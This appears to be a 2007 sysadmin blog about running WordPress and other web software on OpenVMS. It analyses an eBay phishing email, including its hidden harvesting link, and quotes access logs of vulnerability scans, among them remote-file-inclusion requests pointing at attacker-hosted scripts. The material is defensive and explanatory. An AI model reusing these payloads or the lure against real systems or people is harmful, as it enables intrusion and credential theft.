Update
Tonight I updatd the blog to WordPress version 2.1.3, as simple as usual (backup all files, remove a number of PHP files, roillout the zip-file (in the generic location) and run the upgrade script – once for each of the blogs), and the specific include file that I had to edit in the begining (classes.PHP) has been disabled by now – the code now runs out-of-the-box.
The theme that I use now isnt fully compatible, it seems: the image of the OpenVMS Forum expanded well into the textual area so I removed the link to the image. But for the rest, it looks good.
Reason for this update: I want to create a blog on this year’s bootcamp, either within SYSMGR or separately. I found a nice theme that I can use – after some adaptations. I’m still working on that. It may become the major entrypoint of the web as well – this is under investigation. But there is one problem: it requires a plugin that causes tremendous problems: It causes any admin function to fail – even when not enabled – by exhausting over 8 Mb of memory….(that is: 800.000 in hex). And I found it may require PHP 4.3 – at least. So wheter it cab ne used remains to be seen.
Webserver issues?
It looks as if the webserver has some problems – it seems to be stalled sometimes, even static pages won’t show up. I restarted the server yesterday, since there has been very heavy traffic for a few minutes, causing a lot of pagefaults and leaving the pagefile full for about 70% – where it was less than 50. It did make some difference, but I guess I’ll need to do more. But a full stop of the system is out of the question, unless as a last resort.
Phishing
This message appears to come from eBay, but here are few clues that show it’s fake.
The original message is HTML – not uncommon – but that hides one crucial item.
The text itself should trigger you directly: it starts with the wrong header in the first place.
Dear eBay Community Member,
Next it tries to frighten you off:
We regret to inform you that your eBay account
has been suspended due to concerns we have for the
safety and integrity of the eBay community.
and it continues with some more bla bla, to push up the pressure, until there is the offering of relief:
Due to the suspension of this account, please be advised you are prohibited from using eBay in any way. This includes the registering of a new account. To confirm that you are the righfull owner of the account please confirm your identity by signing in and resolving this dispute
at: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&CaseID142Disupte#1562
Right? This is where the danger lurks – the hidden information.. What you don’t see in HTML is the real link:
<a href="http://credit-card-application.docflow.info/.dll/link.php" target=_blank rel=nofollow></a>
I didn’t try that one, but quite likely it will try to get your identity (username and password) and, likely, credit card information.
Nice: you ARE warned, because to “legalize” the attempt, the message ends:
Please note that any seller fees due to eBay will immediately become due and payable. eBay will charge any amounts you have not previously disputed to the billing method currently on file. Confirm your identity at the following link we provided signing in and resolving this dispute:
Regards,
Safeharbor Department eBay, Inc.
The message header (normally hidden but wel worth examining) shows some interestying features as well:
Return-Path: member@ebay.com
Received: from 66.228.114.66-static.reverse.softlayer.com (66.228.114.66)
by diana.intra.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Fri, 27 Apr 2007 00:05:45 +0100 (CET)
Received: from nwblwibas02-pool1-a154.nwblwi.tds.net ([69.128.127.154] helo=User)
by cpanel.mysteryserver.net with esmtpa (Exim 4.63)
(envelope-from)
id 1HhC5H-0005kH-MJ; Thu, 26 Apr 2007 23:05:03 +0100
Reply-To:
From: “eBay Inc.”
Subject: FPA NOTICE: eBay Registration Suspension – User Agreement – Abusing eBay
Date: Thu, 26 Apr 2007 17:05:37 -0500
MIME-Version: 1.0
Content-Type: text/html;
charset=”Windows-1251″
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – cpanel.mysteryserver.net
X-AntiAbuse: Original Domain – grootersnet.nl
X-AntiAbuse: Originator/Caller UID/GID – [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain – eBay.com
X-Source:
X-Source-Args:
X-Source-Dir:
A few things to keep in mind:
nwblwibas02-pool1-a154.nwblwi.tds.net
This looks like a broadband address from a home system – it’s a (rather basic) Windows PC:
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
When really sent from eBay, it might have been done by a Windows system, but I don’t think they will use “Outlook Express“.
Still thinking default?
Defaults are dangerous.
Therefore, in general, I consider installing packages on their default locations a bad idea. Having the locations writable is dangerous as well.
This is why:
130.91.197.190 - - [16/Apr/2007:15:02:47 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868
What if the file existed? That would mean the site had been compromised before. But since none of the packages exist – or reside on a different (not-so-obvious) place, these request did no more harm than using some CPU, memory and IO.
The same applies to the next requests, some time later:
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
...
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360
If I had packages installed on their default locations, how safe would I have been?
Not that I’m totally immune but at least, avoiding defaults secures the system against these simple attacks. Of course, who’s scanning the webs will locate the obvious. And of course, there is a [WORDPRESS] directory. But not here!
Some stupid thinking again: What does WAMP stand for: Windows/Apache/MySql/PhP?
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
80.237.144.181 - - [22/Apr/2007:13:24:43 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
Either they phoned, or he renewed his IP address, it’s just seconds in between.
22-Apr-2007
Minor Soymail problem
Last Friday, Soymail crashed on accessing one particilar message:
%HTTPD-W-NOTICED, 19-APR-2007 06:29:11, CGI:1969, not a strict CGI
response
-NOTICED-I-SERVICE, https://xxxxxxxxxx
-NOTICED-I-CLIENT, aaa.bbb.ccc.ddd
-NOTICED-I-URI, POST (18 bytes) /cgi-bin/soymail/~
-NOTICED-I-SCRIPT, /cgi-bin/soymail CGI-BIN:[000000]SOYMAIL ()
CGI-BIN:[000000]SOYMAIL.EXE
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (118 bytes)
%SYSTEM-F-ACCVIO, access violation, reason mask=00,
virtual address=0000000000000000, PC=00000000000994E8, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:3350/0 net:493/0
but other messages were fine. I created WATCH file of both and send them to Mark Daniel, he requested a debug output from SOYMAIL (just setup one SYSTEM logical and it’s done! – don’t forget to deassign it afterwards – and he came up withj the reason: the header contains a LF character where the standard doesn’t allow one, he made a patch and set it. This solved the problem. It’s preliminary so I should consider it Beta. But it works now so I leave it on the system. The new version will soon be released anyway.
For the rest – nothing in particular. Just that I’ve been looking into WP version 2.1.3 – still have to see if this theme is all right. I had a look to another one, but that is to be changed somewhat – I’m missing parts I want to have. But in general, it looks good.
Fot the bootcamp blog, I will use WordPress, I think. PHPBB2 is actually overdone, and Phorum (that has a BLOG facility) cannot be used for now due to the PHP version.
Minor WordPress problem
Browsing older entries I noticed that some had the worng date as their title. I tried to change that by editing the message in WordPress but for some reason, thgis failed and changed were not applied:
%HTTPD-W-NOTICED, 22-APR-2007 23:03:19, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 192.168.0.33
-NOTICED-I-URI, POST (26 bytes) /sysblog/wp-admin/post.php
-NOTICED-I-SCRIPT, /sysblog/wp-admin/post.php sysblog:[wp-admin]post.php (cgi_exe:phpwasd.exe) SYSBLOG:[wp-admin]post.php
-NOTICED-I-CGI, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:1986/0 net:962/0
so I had te use MyPhpAdmin to make the chnages directly in the database. It may speed up installation of 2.1.3….
17-Apr-2007
PHP trouble
Looking into Operator.log, I noticed a number of messages like:
%%%%%%%%%%% OPCOM 16-APR-2007 01:15:59.12 %%%%%%%%%%%
Message from user HTTP$SERVER on DIANA
Process HTTPd:80 reports
%HTTPD-W-NOTICED, CGI:1969, not a strict CGI response
Looking into the webserver log, it’s quite obvious. Since 13-Apr02007, it happens again and again, sevarl times in a row:
%HTTPD-W-NOTICED, 13-APR-2007 03:06:37, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 87.118.112.246
-NOTICED-I-URI, GET (22 bytes) /sysblog/index.php?p=4
-NOTICED-I-SCRIPT, /sysblog/index.php sysblog:[000000]index.php (cgi_exe:phpwasd.exe) SYSBLOG:[000000]index.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (62 bytes) %DEBUGBOOT-W-CHN, assign channel system service request failed
-NOTICED-I-RXTX, err:0/0 raw:319/0 net:319/0
and mostly from this address – and one or two others. Not just on the weblog, the very same occurred on the forum index page.
In the access log, it shows up as well – inside a whole bunch of accesses to the blog:
87.118.112.246 - - [13/Apr/2007:03:06:30 +0100] "GET /sysblog/index.php?m=200701 HTTP/1.0" 200 16701
87.118.112.246 - - [13/Apr/2007:03:06:37 +0100] "GET /sysblog/index.php?p=4 HTTP/1.0" 502 881
87.118.112.246 - - [13/Apr/2007:03:06:39 +0100] "GET /sysblog/index.php?m=20070104 HTTP/1.0" 200 11351
Accoring to the access log, the whole blog has been extracted:
87.118.112.246 - - [13/Apr/2007:03:03:25 +0100] "GET / HTTP/1.0" 200 3475
87.118.112.246 - - [13/Apr/2007:03:03:28 +0100] "GET /forums/index.php HTTP/1.0" 200 22584
...
87.118.112.246 - - [13/Apr/2007:03:46:06 +0100] "GET /sysblog/index.php?page_id=2 HTTP/1.0" 200 9767
87.118.112.246 - - [13/Apr/2007:03:46:11 +0100] "GET /sysblog HTTP/1.0" 404 868
and as far I could quickly scan the logfile, it’s every entry, but each is valid.
On 14-Apr-2007, there was another wave of access – from the same address:
87.118.112.246 - - [14/Apr/2007:21:35:46 +0100] "GET / HTTP/1.0" 200 3475
87.118.112.246 - - [14/Apr/2007:21:35:48 +0100] "GET /forums/index.php HTTP/1.0" 200 22584
87.118.112.246 - - [14/Apr/2007:21:35:53 +0100] "GET /sysblog/index.php HTTP/1.0" 200 14884
...
87.118.112.246 - - [14/Apr/2007:21:44:29 +0100] "GET /sysblog HTTP/1.0" 404 868
87.118.112.246 - - [14/Apr/2007:21:44:29 +0100] "GET /sysblog/index.php?feed=rss2&p=36 HTTP/1.0" 200 793
Just getting the feeds, perhaps?
The address doesn’t translate to a domain, it seems, but I could get at least some hint. It appears to be German:
$ dig -x 87.118.112.246
; < <>> DiG 9.3.1 < <>> -x 87.118.112.246
;; global options: printcmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 35963
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;246.112.118.87.in-addr.arpa. IN PTR
;; ANSWER SECTION:
246.112.118.87.in-addr.arpa. 71593 IN PTR ns.km30229.keymachine.de.
;; AUTHORITY SECTION:
112.118.87.in-addr.arpa. 28648 IN NS ns.keyweb.de.
112.118.87.in-addr.arpa. 28648 IN NS ns2.keyweb.de.
;; ADDITIONAL SECTION:
ns.keyweb.de. 83446 IN A 62.141.60.15
ns2.keyweb.de. 83446 IN A 62.141.49.15
;; Query time: 706 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Apr 17 18:28:13 2007
;; MSG SIZE rcvd: 157
At least, I have one more question to be answered at the bootcamp!
Bootcamp blog
Speaking about the OpenVMS bootcamp: such a blog is something I consider to set up. I may use Phorum, if that works with the currently installed MySQL version, which I doubt since the relase notes tell me I need at least 4.3 and I’m running 4.1 on VMS. Otherwise, I may create another PHPBB2 forum for it, either new or an expamnsion of the Dutch forums, or I could take the opportunity to get it running using WordPress 2.1.
There too little time to develop a full-featured real-VMS application to do the job ;).